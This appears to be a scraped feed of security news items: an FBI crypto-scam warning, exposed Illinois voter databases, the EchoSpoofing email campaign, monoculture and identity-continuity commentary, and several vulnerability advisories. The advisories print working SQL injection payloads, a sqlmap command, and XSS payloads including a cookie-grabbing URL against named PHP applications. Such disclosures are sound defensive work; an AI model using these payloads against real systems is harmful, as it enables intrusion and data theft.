The FBI warns about scammers that impersonate employees of cryptocurrrency exchanges as a means to defraud victims

The Federal Bureau of Investigation (FBI) issued a public service announcement warning the public about scammers impersonating cryptocurrency exchange employees to steal funds.

There are many types of crypto related scams, but in this case, the FBI provided an advisory about scammers that contact the target and pretend to be employees of a cryptocurrency exchange.

As scammers almost always do, they try to impose a feeling of urgency on the target, making potential victims feel as though they must act quickly because of, say, an acute problem with their account. Such an account may be allegedly compromised, or scammers could trick a victim into thinking that a third party is trying to gain access and withdraw funds from the account.

The scammer then offers to help the target to secure their funds, but to do so, the scammer—posing as a legitimate employee of the cryptocurrency exchange—first needs the victim’s log in credentials. Sometimes, scammers also send a malicious link to the victim which takes the victim to a illegitimate site that can collect identification information.

Armed with the information the target provided, the scammer drains the account. In a sense, the false warning that first came from the scammer was true—someone was after their account, it’s just that this specific someone was the person talking to the victim themselves.

Very similar scams exist that involve bank accounts, but most people are aware of how they can check and verify that the person they are in contact with actually works for their bank. With cryptocurrency exchanges, this is often not true.

Also, we see a lot of scary stories in the news about exchanges getting robbed or even disappearing with their customer’s money. Some crypto-related scams often deploy imposter websites which are hard to discern from the real ones.

Recovery services are another successful avenue for scammers. In June, the FBI warned of fraudsters posing as lawyers representing fictitious law firms that contact scam victims and offer their services, claiming to have the authorization to investigate fund recovery cases.

These scammers are usually after more money or personal information that could lead to identity theft.

The California Department of Financial Protection & Innovation (DFPI) has a very useful crypto scam tracker that allows visitors to read and search through hundreds of different real-life scenarios of crypto-related scams.

The most important ground rule when it comes to cryptocurrency or financial scams of any kind is: if it sounds too good to be true, it likely is.

Besides that, there are a few other guidelines that can keep you out of trouble.

*   Don’t respond to messages, emails or other communications that arrive unexpectedly or from strange senders/phone numbers.
*   First verify that the person you are communicating with represents the company they claim to work for. Do this using another channel. A call to a number you know to be legitimate, for example.
*   Don’t let scammers rush you into decisions or actions. They try to make you feel a sense of urgency, so you don’t take the necessary time to think things through.
*   Always research whether the cryptowallet, cryptoexchange, or app they are sending you to is trustworthy before signing up for it or installing something.
*   Use multi-factor authentication (MFA) for existing accounts which makes it harder for anyone to take over your account.
*   Never give out more information than absolutely necessary. A legitimate company will not ask for more information.

The FBI requests victims report activity associated with this scam to the FBI IC3 at www.ic3.gov.

The FBI also requests victims provide any transaction information associated with the scam. For more information on what to provide the FBI, see prior IC3 PSA Alert Number I-082423-PSA.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Scammers are impersonating cryptocurrency exchanges, FBI warns 

Social Security numbers, death certificates, voter applications, and other personal data were accessible on the open internet, highlighting the ongoing challenges in election security.

Databases containing sensitive voter information from multiple counties in Illinois were openly accessible on the internet, revealing 4.6 million records that included driver's license numbers as well as full and partial Social Security Numbers and documents like death certificates. Longtime security researcher Jeremiah Fowler stumbled upon one of the databases that appeared to contain information from DeKalb County, Illinois, and subsequently discovered another 12 exposed databases. None were password protected nor required any type of authentication to access.

As criminal and state-backed hacking becomes ever more sophisticated and aggressive, threats to critical infrastructure loom. But often, the biggest vulnerabilities come not from esoteric software issues, but from gaping errors that leave the safe door open and the crown jewels exposed. After years of efforts to shore up election security across the United States, state and local awareness about cybersecurity issues has improved significantly. But as this year's US election quickly approaches, the findings reflect the reality that there are always more oversights to catch.

“I’ve found voter databases in the past, so I kind of know if it's a low-level marketing outreach database that someone has purchased,” Fowler tells WIRED. “But here I saw voter applications— there were actually scans of documents, and then screenshots of online applications. I saw voter rolls for active voters, absentee voters with email addresses, some of them military email addresses. And when I saw Social Security numbers and driver’s license numbers and death certificates I was like, ‘OK, those shouldn’t be there.’”

Through public records, Fowler determined that all of the counties appear to contract with an Illinois-based election management service called Platinum Technology Resource, which provides voter registration software and other digital tools along with services like ballot printing. Many counties in Illinois use Platinum Technology Resource as an election services provider, including DeKalb, which confirmed its relationship with Platinum to WIRED.

Fowler reported the unprotected databases to Platinum on July 18, but he says he didn't receive a response and the databases remained exposed. As Fowler dug deeper into public records, he realized that Platinum works with the Illinois-based managed services provider Magenium, so he sent a disclosure to this company as well on July 19. Again, he says he did not receive a response, but shortly after the databases were secured, pulling them from public view. Platinum and Magenium did not return WIRED's multiple requests for comment.

Platinum began distributing a notification, viewed by WIRED, to impacted counties on Friday. “We have evidence of a claim the file storage containing voter registration documents may have been scanned,” Platinum wrote, adding that the exposed databases do not indicate a deeper compromise of its systems. “There was a thorough investigation executed. The findings support our ongoing belief there is no evidence of voter registration forms being leaked or stolen … We used this opportunity to deploy new and additional safeguards around voter registration documents.”

Illinois's data breach notification law requires notification to the state within 45 days of an incident. A standard version of a Champaign County contract for technology services posted publicly through a Freedom of Information Act request requires a contractor to notify the impacted county within 15 minutes of identifying a data breach.

Fowler points out that while the exposed information would potentially make impacted individuals more susceptible to identity theft and other scams, it could also be abused to submit multiple absentee ballot requests or to conduct other suspicious activity that could call a voter's legitimate vote into question and take time to reconcile. But he adds that the death certificates and other documentation contained in the trove reflect the work election officials do all over the country to manage voter registrations and ensure that everyone's vote is accurately counted.

“There’s definitely progress on basic data security, and I don’t see stuff like this very often anymore,” Fowler says. “But I used the open and public internet and no specialized tools to find this. And at the end of the day, this is critical infrastructure that was exposed.”

Sensitive Illinois Voter Data Exposed by Contractor’s Unsecured Databases

In a monoculture, cybercriminals need to look for a weakness in only one product, or discover an exploitable vulnerability, to affect a significant portion of services.

Source: Skorzewiak via Alamy Stock Photo

Could the US federal government inadvertently be fueling perfect storm conditions for another unprecedented cyber incident that would have widespread implications for federal, state, and critical infrastructure services, similar to the recent CrowdStrike outage? 

**Setting the Stage**

The US State and Local Cybersecurity Grant Program (SLCGP) provides funding to eligible entities to improve cybersecurity posture and reduce the risk of a cyberattack. This is, of course, good, as many public entities have lacked the budget necessary to have a cybersecurity posture suitable to protect the personal data or services they provide.

Prior to this funding, each entity would make their own decision on cybersecurity and need to fund it from existing budgets. For example, a school district may select a vendor based on services and price, the neighboring school district could choose a different vendor, and so on. For the financially frugal, this would seem like a bad solution. If entities were to group together and use a single vendor, they would get bulk purchase discounts and lower the amount of tax dollars spent. 

But ask a cybersecurity professional to describe the best cybersecurity posture and they will use terms like "defense in depth" or "layers of defense." This refers to the use of multiple technologies, and in most cases multiple vendors, in order to thwart potential attacks, or incidents such as CrowdStrike's single corrupt driver causing a global outage at multiple major companies. 

When the SolarWinds cyberattack unfolded there were 33,000 private, federal, and state users of the technology, with about 18,000 installing the malicious update. The backlash of this supply chain attack resulted in new regulation on improving supply chain security, and this continues to play out today. While the attack was devastating, it was not a cyber-Armageddon event, as states, entities within states, federal agencies, and such were using a diverse set of solutions from different vendors.

The recent, unfortunate incident suffered by CrowdStrike customers highlights how devastating a single vendor issue can be, with just 8.5 million devices affected globally (representing less than 1% of Windows devices) causing mass global disruption to airlines, healthcare facilities, businesses, and more. 

**Creating a Monoculture**

Now consider the offer of SLCGP, which gives free money to spend on cybersecurity — it's like moths attracted to a light. A state can apply for funds from the grant to cover multiple entities within its jurisdiction. Once granted, a vendor is selected and offered to entities statewide, either free or highly discounted due to volume licensing. This creates a monoculture cybersecurity environment, or a perfect storm for a major cyber incident, where if the primary vendor is attacked or has a significant vulnerability exploited, it could take out the entire state's services, every school district, local government administration, etc. The effect on everyday society could be devastating. 

The SolarWinds and CrowdStrike incidents demonstrate, on a limited scale, that when a single vendor suffers an incident of some type, if there are enough affected parties, the incident becomes significant, and if they are all grouped in a single state, it becomes a major incident.

If a single vendor becomes the de facto standard for states that apply for SLCGP (a good possibility: I personally know of some organizations that have been rolled into a standard solution as part of a no-cost, or near-no-cost, state solution)

To put this in context, there are approximately 50 million US children of school age. If 90% of states are customers of one solution, and this includes state-funded education, the impact of a cyber incident would see 45 million children's educations being disrupted. And in some instances, schools have suffered significantly when hit by a cyber incident — requiring closure for potentially months. And education is just one area affected by single-vendor risk.

The SLCGP appears to be creating a new monoculture environment, on a scale that could make the previous incidents pale into insignificance. Monoculture is a term typically used in farming. In brief, it is about crop rotation — diversity in planting in order to protect both the crop and the fields in which the crops are planted. If a single crop is planted in the same field over several seasons the outcome results in bad yield. 

**Promoting Diversity in Cybersecurity**

In 2015, an academic paper detailed the issues of monoculture cybersecurity relating to the use of antivirus (AV) products. It concluded that "lowered infection rates were positively correlated with higher rates of AV activity, stable AV product usage and status, and AV product diversity." The importance of a diverse product selection prevents a single incident, whether malicious or unfortunate, from causing a catastrophic outage. 

The actions by states to standardize on a single product using the SLCGP is creating a dominant security product scenario that causes monoculture, a default standard for cybercriminals to attack. Cybercriminals need to look for a weakness in only one product, or to discover an exploitable vulnerability, to affect a significant portion of services, potentially affecting the entire population of a state.

The solution is to promote, and require, diverse layers of defense architecture, and this should be a requirement of receiving SLCGP funding. 

**About the Author**

Chief Security Evangelist, ESET

With over 20 years of security industry experience, Tony Anscombe is an established author, blogger and speaker on the current threat landscape, security technologies and products, data protection, privacy and trust and internet safety. His speaking portfolio includes industry conferences RSA, Black Hat, VB, CTIA, MEF, Gartner Risk and Security Summit and the Child Internet Safety Summit. He is regularly quoted in security, technology, and business media, including BBC, the Guardian, the New York Times and USA Today, with broadcast appearances on Bloomberg, BBC, CTV, KRON, and CBS.

Is the US Federal Government Increasing Cyber-Risk Through Monoculture?

A simple toggle in Proofpoint's email service allowed for brand impersonation at an industrial scale. It prompts the question: Are secure email gateways (SEGs) secure enough?

Source: Cheryl Ann Quigley via Alamy Stock Photo

Millions of near-undetectable emails impersonating blue chip companies were spreading every day through the first half of 2024, thanks to some permissive features of Microsoft 365 and Proofpoint's email protection service.

Proofpoint's secure email gateway (SEG) is a kind of firewall for corporate emails, filtering what comes in and applying authentication to what goes out. Recently, though, researchers from Guardio uncovered a campaign undermining that outbound part, utilizing a "super-permissive misconfiguration flaw" to send credit-card scam emails that were signed and verified as if they came from legitimate, brand name corporate accounts.

"It puts recipients in a weird place," says Adam Maruyama, field CTO at Garrison Technology. "You can receive a spoofed email and be affected, even if you've done your full \[cybersecurity\] due diligence to try to protect yourself."

Proofpoint has since implemented a fix which has all but killed the campaign, but some broader questions around email security linger.

**How "EchoSpoofing" Worked**

"There's not been a lot that has changed in the underlying infrastructure of what email is since it first started," says Jeremy Fuchs, office of the CTO at Check Point Software. For example, "The sender address in an email is kind of like the sender address in snail mail. I could send you a letter and say it's coming from the North Pole, and there really wouldn't be anything anyone could do to stop it. It's not that simple in the digital world, but it's still fairly easy." 

In the campaign, which Guardio called "EchoSpoofing," the attacker took advantage of this fact by setting up their own Simple Mail Transfer Protocol (SMTP) server on a virtual server. From there, they could send out emails with whatever "From" header they wished — for example, a fake customer service account coming from an @disney.com or @northpole.cool domain.

Of course, any modern security solution that employs anti-spoofing technology like Domain-based Message Authentication Reporting & Conformance (DMARC) monitoring or spam filter would catch suspicious emails coming from a random server. But this is where the EchoSpoofing vulnerability comes into play.

It turned out that Proofpoint's SEG contained a toggle which, when turned on, trusted any emails routing through Microsoft Office 365. Microsoft 365 is a commonly used mail service among businesses, but anybody — including a hacker — can also use it. Thus, if a hacker could send mail through Microsoft to a Proofpoint customer, it would be trusted by default and passed along.

This is where mail exchange (MX) records came in handy. MX records in the Domain Name System (DNS) specify the mail servers responsible for handling email for a domain. Companies that use Proofpoint SEG send their MX records to Proofpoint's servers. These records are public so, Fuchs observes, "they weren't just guessing about who to target. They knew exactly who they could target."

In summary: the attacker forged emails mimicking major corporations (including Disney, Best Buy, ESPN, IBM, Coca Cola, Nike, Fox News, and dozens more) from a private SMTP server, then relayed them through Microsoft 365 to known Proofpoint customers. If the customer had the "super-permissive" setting toggled on, Proofpoint would stamp the malicious emails with the same Domain Keys Identified Mail (DKIM) verification it would legitimate emails, then sent them on to victim inboxes.

**Millions of Fake Emails a Day**

The EchoSpoofing campaign began in January, and was first discovered by Proofpoint itself in late March. At that point, the company explained in a blog post, it took a number of steps to notify and protect customers.

But those efforts did not stem the tide of attacks. In fact, the forged emails only grew in number — averaging three million per week, and occasionally surpassing ten million.

Source: Guardio

Dark Reading reached out to Proofpoint for more information on why email attacks only rose after its initial remediation efforts began. Proofpoint representatives pointed Dark Reading to passages of its blog, and did not provide further comment.

Perhaps the campaign survived because the attacker had a keen operational awareness. As Guardio explained, "Once it finds a vulnerable Proofpoint account (by testing out this exploit on a small scale), it saves the domain for later use, forcing time gaps between delivery opportunities. It switches abused domains and Office365 accounts each time, making it harder to spot the activity and trying to stay 'under the radar' as much as possible."

This diligence may have been the key to the campaign's staying power, even after it had been detected. "It was quite interesting to see how, once the campaign was spotted and Proofpoint customers started to patch and block this exploit, the threat actor realized the decline and started burning out assets — realizing 'the end is near' — as can be seen with the disney.com domain usage in the above graph in early June 2024."

EchoSpoofing finally seems to have died down recently, after Proofpoint introduced a vendor-specific header for outgoing emails. Now, customers can restrict the 365 accounts allowed to send emails on their behalf to only their own.

**Being Diligent About Corporate Email**

Besides permissiveness, negligence too paved the way for the EchoSpoofers.

According to Guardio, despite Proofpoint's efforts to alert Microsoft, the attackers' maliciously-wielded Office365 accounts remain active many months later. In a statement to Dark Reading, a Microsoft spokesperson claimed that "When our partner alerted us to this issue, we took immediate action to investigate. We blocked tenants abusing our service and disabled accounts deemed fraudulent."

Then there were the companies that were victims of being spoofed. As Nati Tal, head of Guardio Labs, notes, they weren't powerless to detect millions of fake emails impersonating their brands. "In this case, if someone from Disney or wherever was looking at the amount of emails being sent out from their ProofPoint \[server\], it would probably have popped out immediately, at the first moment. You would see some kind of anomaly."

That, he says, should be a lesson that "You need to implement some kind of logging, some kind of data tracking for your email distribution."

Organizations that don't implement secure email controls like DMARC monitoring risk far greater cyber consequences than EchoSpoofing has demonstrated thus far. As Maruyama reflects, "I think my concern is that these have been pretty generic spam attacks. 'Click here', then they try to steal your credit card number. I could see a world in which a more sophisticated actor would save a similar vulnerability to do very targeted spear phishing to, for example, get emails through that look like they are from the government and defense services, targeted toward individuals in the Pentagon, DHS, etc. That is a much bigger threat, with due respect to folks who've had credit cards stolen here."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Disney, Nike, IBM Signatures Anchor 3M Fake Emails a Day

This is the official vulnerability disclosure report for CVEs CVE-2024-38881 through CVE-2024-38891 by jTag Labs. This report details critical security vulnerabilities found within Caterease Software, a product of Horizon Business Services Inc. These vulnerabilities have significant implications for the confidentiality, integrity, and availability of the software and the sensitive data it handles. The issues include problems like remote SQL injection, command injection, authentication bypass, hard-coded credentials, and more.

Caterease Software SQL Injection / Command Injection / Bypass

Tourism Management System version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Tourism Management System v2.0 - Cross Site Scripting (XSS)# Date: 13 July 2024# Exploit Author: Sampath kumar kadajari# Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7204 # Version: v2.0# CVE: CVE-2024-41333# Tested on: Windows, XAMPP, Apache, MySQL-------------------------------------------------------------------------------------------------------------------------------------------A reflected cross-site scripting (XSS) vulnerability in Phpgurukul Tourism Management System v2.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the uname parameter."Vulnerable Code" – (/admin/user-bookings.php)<h2>Manage <?php echo $_GET['uname'];?>'s Bookings</h2>---> Affected Component: http://localhost/tms/admin/user-bookings.php?uid=manju@gmail.com&&uname=%22%3E%3Cimg%20src/onerror=prompt(document.cookie)%3E "Fix for Vulnerable Code" <h2>Manage <?php echo htmlspecialchars($_GET['uname'], ENT_QUOTES, 'UTF-8'); ?>'s Bookings</h2>

Tourism Management System 2.0 Cross Site Scripting

Computer Laboratory Management System version 1.0 suffers from an incorrect access control that allows for privilege escalation.

    # Exploit Title: Computer Laboratory Management System v1.0 - Incorrect access control# Date: 08 July 2024# Exploit Author: Sampath kumar kadajari# Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html# Software Link: https://www.sourcecodester.com/download-code?nid=17268&title=Computer+Laboratory+Management+System+using+PHP+and+MySQL# Version: v1.0# CVE: CVE-2024-41332# Tested on: Windows, XAMPP, Apache, MySQL-------------------------------------------------------------------------------------------------------------------------------------------Incorrect access control in the delete_category function of Sourcecodester Computer Laboratory Management System v1.0 allows authenticated attackers with low-level privileges to perform arbitrarily delete actions. "Vulnerable Code" – ( classes/master.php)function delete_category(){        extract($_POST);        $del = $this->conn->query("UPDATE `category_list` set `delete_flag` = 1 where id = '{$id}'");        if($del){            $resp['status'] = 'success';            $this->settings->set_flashdata('success'," Category successfully deleted.");        }else{            $resp['status'] = 'failed';            $resp['error'] = $this->conn->error;        }        return json_encode($resp);}---> Affected Component:  http://localhost/php-lms/classes/Master.php?f=delete_category"Fix for Vulnerable Code":function delete_category(){    // Check if the user is logged in and has an admin role    if (!isset($_SESSION['userdata']['role']) || $_SESSION['userdata']['role'] != 'admin') {        $resp['status'] = 'failed';        $resp['error'] = 'Unauthorized access.';        return json_encode($resp);    }    // Proceed with the delete action if authorized    extract($_POST);    $del = $this->conn->query("UPDATE `category_list` set `delete_flag` = 1 where id = '{$id}'");    if($del){        $resp['status'] = 'success';        $this->settings->set_flashdata('success',"Category successfully deleted.");    }else{        $resp['status'] = 'failed';        $resp['error'] = $this->conn->error;    }    return json_encode($resp);}

Computer Laboratory Management System 1.0 Privilege Escalation

Leads Manager Tool suffers from remote SQL injection and cross site scripting vulnerabilities.

    [x]========================================================================================================================================[x] | Title        : Leads Manager Tool SQL & XSS[stored)] Vulnerabilities | Software     : Leads Manager Tool Using PHP and MySQL with Source Code | Create By  : https://www.sourcecodester.com/users/remyandrade | First Release: 25/01/22 | Download     : https://www.sourcecodester.com/php/17510/leads-manager-tool-using-php-and-mysql-source-code.html | Date         : 30 Agustus 2024 | Author       : OoN_Boy[x]========================================================================================================================================[x] | Technology       : PHP | Database         : MySQL | Price            : FREE | Description      : Leads Manager Tool, a comprehensive web application designed to streamline the process of managing business leads. Built with the power of PHP and MySQL, this tool offers a seamless and user-friendly experience for storing, updating, and organizing lead information[x]========================================================================================================================================[x][O] Exploit    http://localhost/leads-manager-tool/endpoint/delete-leads.php?leads=[SQL]  http://localhost/leads-manager-tool/endpoint/add-leads.php    [O] Proof of concept  [SQL]  Parameter: leads (GET)    Type: boolean-based blind  Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause  Payload: leads= --emurate' RLIKE (SELECT (CASE WHEN (8305=8305) THEN 0x202d2d656d7572617465 ELSE 0x28 END))-- rUwl  Type: error-based  Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  Payload: leads= --emurate' OR (SELECT 1382 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(1382=1382,1))),0x7176706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vKls  Type: stacked queries  Title: MySQL >= 5.0.12 stacked queries (comment)  Payload: leads= --emurate';SELECT SLEEP(5)#  Type: time-based blind  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  Payload: leads= --emurate' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))fAev)-- ZNBt    [XSS]    POST /leads-manager-tool/endpoint/add-leads.php HTTP/1.1  Host: 127.0.0.1  Accept-Encoding: gzip, deflate, br  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  Accept-Language: en-US;q=0.9,en;q=0.8  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36  Connection: close  Cache-Control: max-age=0  Origin: http://127.0.0.1  Upgrade-Insecure-Requests: 1  Referer: http://127.0.0.1/leads-manager-tool/  Content-Type: application/x-www-form-urlencoded  Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="126", "Chromium";v="126"  Sec-CH-UA-Platform: Windows  Sec-CH-UA-Mobile: ?0  Content-Length: 85  leads_name=Vrs<script>alert(1)</script>Hck&email_add=vrs-hck@maho.id&phone_number=911-911-9111    [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]

Leads Manager Tool SQL Injection / Cross Site Scripting

Readymade Unilevel Ecommerce MLM suffers from remote blind SQL injection and cross site scripting vulnerabilities. These issues affected the version released as late as March 15, 2024.

    [x]========================================================================================================================================[x] | Title        : Readymade Unilevel Ecommerce MLM Blind SQL & XSS Vulnerabilities | Software     : Readymade Unilevel Ecommerce | Last Update  : 15/03/24 [TESTED VERSION SCRIPT] | First Release: 16/11/21 | Vendor       : http://www.i-netsolution.com/ | Date         : 01 Agustus 2024 | Author       : OoN_Boy[x]========================================================================================================================================[x] | Technology       : PHP | Database         : MySQL | Price            : $500 | Description      : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.[x]========================================================================================================================================[x][O] Exploit    http://localhost/eommlm/product-details.php?id=11[SQL]  http://localhost/ecomlm/product-details.php?id=11[XSS]  [O] Proof of concept    sqlmap.py -u "http://localhost/eommlm/product-details.php?id=11" --invalid-string    [SQL]  Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=11 AND 1189=1189    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: id=11;SELECT SLEEP(10)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL)    [XSS]    http://localhost/ecomlm/product-details.php?id=11"><img/src/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY>    [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]

ReadyMade Unilevel Ecommerce MLM Blind SQL Injection / Cross Site Scripting

Having a robust identity continuity plan is not just beneficial but essential for avoiding financially costly and potentially brand-damaging outages.

Source: Borka Kiss via Alamy Stock Photo

COMMENTARY  
In the modern enterprise, where IT infrastructure, applications, and data are spread across multiple clouds, hybrid clouds, and on-premises data centers, identity ensures that the right individuals have access to the right resources at the right times. In many ways, identity is now on par with electricity when it comes to business continuity. Without it, business operations grind to a standstill. 

Just as most businesses have backup power sources so they can continue to operate when their electric utility goes down, organizations should implement an identity continuity plan to maintain the availability of critical IT systems if their primary identity provider (IDP) is offline. Having a failover plan is more critical than ever, since many organizations now rely on cloud-based IDPs that are vulnerable to outages for a host of reasons, including provider outages, natural disasters, loss of Internet connectivity, and more. 

When developing an identity continuity strategy, the NIST Cybersecurity Framework can serve as a valuable model to follow. Designed to help organizations manage and mitigate cybersecurity risks, it consists of five core functions: Identify, Protect, Detect, Respond, and Recover. Each function plays a pivotal role in forming a robust identity continuity plan. Here’s how to map an identity continuity plan to the NIST Cybersecurity Framework. 

**Identify****Inventory Applications, Policies, and Identities**

The initial step in creating an identity continuity plan involves cataloging all applications, policies, and identities within the organization. This inventory should distinguish between different user groups, such as customers and employees, to address their specific access requirements effectively.

This process should include detailing interdependencies and criticalities to ensure comprehensive coverage. Classifying these resources based on their criticality and the potential impact of downtime helps prioritize efforts. For instance:

*   Critical applications: These are vital for immediate business operations, like primary revenue-generating platforms.
    
*   Important applications: These support daily operations but can endure short periods of downtime.
    
*   Supportive applications: These are necessary but not critical on an hour-to-hour basis.
    
*   Non-essential applications: These can tolerate extended downtimes without significant impact.
    

**Routine Continuity Tests**

Regularly testing the continuity plan is crucial for identifying gaps and ensuring its effectiveness. Routine tests help keep the plan up to date and ready for real-world disruptions.

**Protect****Ensure Continuous Identity Operations**

Protecting identity operations requires ensuring continuous access to identity services. This includes establishing robust mechanisms for cloud-to-cloud and cloud-to-premises failovers. With many organizations adopting zero-trust architectures, where each access request requires continuous authentication and authorization checks, identity continuity is even more critical to ensure end-to-end security.

**Develop Disaster Recovery Plans**

While preventing outages is always best, in addition to continuity planning it's critical to also have a disaster recovery plan. Regular backups of policies and resources from cloud and on-premises identity infrastructures ensure quick restoration if a rebuild is necessary.

**Detect****Monitor Identity Infrastructure**

Implement centralized analytics and reporting to continuously monitor the availability of identity and access services. Early detection of outages or slowdowns allows for prompt intervention and proactive response.

**Conduct Regular Testing**

Regular continuity tests simulate real-world scenarios to detect potential weaknesses in the identity infrastructure. This proactive "test to verify" approach ensures that the continuity plan is robust and effective.

**Respond****Maintain Continuous Identity Operations**

Develop strategies for failover and fail-back to ensure continuous identity operations. Predefined custom actions, alerts, and automations should be in place to handle various scenarios.

**Establish Failover Mechanisms**

Multiple layers of failover mechanisms ensure redundancy and resilience. For example, assign:

*   Primary identity provider (IDP)
    

*   On-premises IDP (as a last-resort backup)
    

**Predefine Continuity Actions**

Having predefined continuity actions ensures a swift and organized response to identity service disruptions. Actions can include automatic service ticket opening, initiating an incident response workflow, or some other scriptable action. This minimizes downtime and mitigates its impact on operations.

**Recover****Manage Incidents and Resolve Outages**

An incident management plan should outline the steps for failover, failback, and incident resolution. The focus should be on quick recovery while documenting and analyzing any anomalies. Use data collected for availability and outages with your IDP vendor to negotiate expectations.

**Run Disaster Recovery Backups**

Ensure the disaster recovery plan includes procedures for running backup and restore operations. This enables swift recovery from identity service outages, minimizing downtime.

**Govern****Continuous Monitoring and Policy Management**

Implement continuous monitoring of identity systems to ensure adherence to established policies. Regularly update, document, and report policies to reflect changes in the IT environment and emerging threats.

**Monitor Access Requests and Activities**

Track access requests and activities to identify unusual patterns that may indicate security threats. Continuous monitoring helps maintain a proactive defense against potential disruptions.

By leveraging the NIST Cybersecurity Framework, organizations can develop a comprehensive identity continuity plan that ensures resilience against disruptions. Now that identity is interwoven into all business operations and predominantly relies on cloud-based IDPs, having a robust identity continuity plan is not just beneficial but essential for avoiding financially costly and potentially brand-damaging outages.

**About the Author**

CEO, Strata Identity

Eric has made a career out of simplifying and securing enterprise identity management. He founded, scaled, and successfully exited both Securant/ClearTrust (Web Access Management) and Symplified, (the first IDaaS company). Recently Eric served as SVP and GM at Oracle, where he ran the identity and security business worldwide and was responsible for product development, go to market, and partnerships. As a technologist, he was a co-author of the SAML standard, created the first pre-integrated SSO platform, and is the visionary behind the Identity Fabric™.

Tag

#auth